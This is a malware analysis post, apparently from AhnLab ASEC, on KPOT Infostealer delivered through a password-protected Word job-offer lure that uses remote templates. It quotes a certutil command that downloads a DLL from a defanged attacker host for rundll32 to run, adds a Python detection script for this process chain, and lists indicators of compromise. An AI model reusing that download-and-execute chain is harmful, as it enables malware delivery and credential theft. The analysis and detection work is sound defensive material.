Malware Disguised as Job Offer Letter

The ASEC analysis team has recently discovered that KPOT Infostealer is being distributed via spam mails carrying Word files. There have been many cases in which an info-stealer is ultimately downloaded once the macro is enabled, but this case stands out because it used a password-protected Word file in a spam mail disguised as a job offer letter to trick users.

Figure 1. Operation process of malware


How the e-mail was distributed has not yet been identified, but the attacker appears to have used a more elaborate scheme to deceive users: the mail carries the content of a job offer letter together with the password for the file, which makes it look as if the message was sent to specific people.

  • Sender: Team Lead
  • E-mail Title: Our Team Job Invitation
  • Mail Details: Hello, our invitation is attached to this message. Your personal password: TBBEx○○○○○○○○○○UP3Vm

Entering the password above decompresses the attached archive. Because the document uses the normal XML Relationship mechanism of the OOXML (Office Open XML) format, with only the relationship target URL being malicious, it is difficult to tell from the file binary alone whether the file is malicious. The settings.xml.rels file contains a URL that loads an external template, and that template holds the malicious macro and payload (see Figure 3). Merely opening the Word file is enough to trigger an attempt to reach the external malicious URL.

Figure 2. A compressed malicious word file that can be uncompressed with a password. The password is written in the e-mail


Figure 3. Malicious URL inserted in document


Figure 4. Automatically attempting to access malicious URL when word file is opened


The DOTM file fetched as the external template contains obfuscated malicious macro code. When the macro runs, KPOT Infostealer is downloaded through the legitimate Windows program certutil.exe, and the downloaded DLL is then run with rundll32.exe.

certutil.exe is a built-in Windows program for managing certificates. Because it can also fetch certificates or arbitrary files from a remote URL and save them locally, using a command such as ‘certutil.exe -urlcache -split -f [URL] [output.file]’, it is sometimes abused to deliver malware, as in this case.

Debugging the obfuscated macro code shows that it downloads a DLL file from the external URL into the %TEMP% path. The downloaded file is the KPOT info-stealer.

certutil.exe -urlcache -split -f hxxps://donattelli[.]com/test/ssi/1.dll C:\Users\[User]\AppData\Local\Temp\rad6FECC.tmp.dll
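The chain described in the paragraphs above (Word launching certutil.exe to download a DLL into %TEMP%, then rundll32.exe loading it) is easy to spot in process-creation telemetry. The following is an added example, not code from the post or from AhnLab: three simple rules applied to constructed Sysmon-style events with ParentImage, Image and CommandLine fields. The events, the user name, the example.invalid URL and the ",#1" export are placeholders; only the rad6FECC.tmp.dll file name is taken from the command line shown above.

```python
import re

# Office applications that should rarely spawn scripting or download utilities.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Built-in Windows binaries commonly abused right after a macro runs.
LOLBINS = {"certutil.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
           "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# A DLL path under the user's AppData\Local\Temp directory (%TEMP%).
TEMP_DLL_RE = re.compile(r"\\appdata\\local\\temp\\[^\s\"']+\.dll", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the detection names that fire for one process-creation event."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    low = cmd.lower()
    hits = []
    if parent in OFFICE_APPS and image in LOLBINS:
        hits.append("office_spawns_lolbin")
    # certutil -urlcache with a URL argument is a download; -hashfile, -dump etc. are not.
    if image == "certutil.exe" and "-urlcache" in low and URL_RE.search(cmd):
        hits.append("certutil_remote_download")
    if image == "rundll32.exe" and TEMP_DLL_RE.search(cmd):
        hits.append("rundll32_dll_from_temp")
    return hits


def scan(events):
    """Run every rule over a list of events; returns (event index, detection name) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in classify(ev)]


# Constructed events mirroring the chain in the post (Word -> certutil -> rundll32),
# plus two benign uses of the same binaries. Paths, user and URL are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\user\Downloads\Invitation.docx"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f https://example.invalid/test/1.dll C:\Users\user\AppData\Local\Temp\rad6FECC.tmp.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\user\AppData\Local\Temp\rad6FECC.tmp.dll,#1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\tools\setup.exe SHA256"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


if __name__ == "__main__":
    for index, hit in scan(SAMPLE_EVENTS):
        print(index, hit, "->", SAMPLE_EVENTS[index]["CommandLine"])
```

The parent-child rule catches the behaviour regardless of which download utility the macro picks, while the two command-line rules give a second, independent signal for the specific certutil and rundll32 usage seen here. On a suspect host, `certutil -urlcache *` lists the URL cache entries that a `-urlcache` download populates, which can corroborate the download even after the DLL has been removed from %TEMP%.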

Figure 5. Download URL found while debugging the macro code, and how the downloaded file is run


Figure 6. certutil.exe and rundll32.exe visible as child processes


KPOT Infostealer is malware that steals data from web browsers, FTP clients, VPN clients, messengers, and cryptocurrency wallets. Through AhnLab’s analysis infrastructure RAPIT, the malware was observed attempting to access the configuration files of WS_FTP, FileZilla, and WinSCP, as well as the account information of the Outlook application.

As shown in Figure 8, the code collects information about the user’s PC and about various applications.

Figure 7. Malicious behaviors of KPOT malware found in AhnLab’s RAPIT


Figure 8. Excerpt of code inside KPOT Info-stealer


As most malware is delivered through spam mails, users should refrain from opening attachments from mails of unknown origin. Even when an e-mail comes from someone trusted, users should double-check the sender’s e-mail address and make a habit of not running the attachment.

Also, users are advised to update the anti-malware engine pattern to its latest version.

AhnLab’s anti-malware product, V3, detects and blocks the malicious files introduced in the post using the aliases below.

[File Detection]
Downloader/DOC.Generic
Downloader/DOC.Agent
Infostealer/Win.KPot.C4565958

[MD5]
1ea7d46d94299fa8bad4043c13100df0
23a471d956410bc80dc0cabc006252f6
dc3f839b6f2a8c1833d9ae4e4f8dc4c6

[URL]
https[:]//donattelli[.]com/
